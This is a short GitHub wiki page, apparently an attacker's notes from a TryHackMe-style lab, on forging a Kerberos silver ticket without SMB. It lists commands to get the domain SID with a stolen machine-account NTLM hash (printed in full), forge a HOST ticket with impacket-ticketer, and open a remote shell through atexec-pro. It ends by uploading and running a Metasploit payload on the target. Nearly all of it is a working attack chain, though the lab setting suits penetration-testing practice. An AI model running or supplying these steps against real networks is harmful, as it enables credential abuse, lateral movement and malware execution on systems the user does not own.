Silver ticket wo SMB - oscpname/RELAY_scenarios GitHub Wiki

TOOLS:https://github.com/Ridter/atexec-pro.git

Steps:

1. get domain SID using lookupsid
2. prepare siverticket with ticketer
3. run atexec-pro for filesless access (wo port 445) and get shell

Setup:

• we have hash of the domain - PC-FILESRV01$:1120:aad3b435b51404eeaad3b435b51404ee:e66f5cf1a026516d1d2220130d8d13c4

proxychains impacket-lookupsid HOLO.LIVE/'PC-FILESRV01$'@10.201.126.30 -hashes :e66f5cf1a026516d1d2220130d8d13c4
#Получаем SID домена: S-1-5-21-471847105-3603022926-1728018720

#prepare silver ticket
proxychains impacket-ticketer -nthash e66f5cf1a026516d1d2220130d8d13c4 -domain-sid S-1-5-21-471847105-3603022926-1728018720 -dc-ip 10.201.126.30 -domain holo.live -spn HOST/PC-FILESRV01.holo.live 'watamet'
export KRB5CCNAME=watamet.ccache

#use atexec-pro
proxychains python3 atexec-pro.py PC-FILESRV01.holo.live -k -no-pass -dc-ip 10.201.126.30

#Внутри шелла:
#ATShell (@PC-FILESRV01.holo.live)> upload /root/THM/Holo/binaries/msf_win_x64.exe C:\Windows\Tasks\msf.exe
#ATShell (@PC-FILESRV01.holo.live)> C:\Windows\Tasks\msf.exe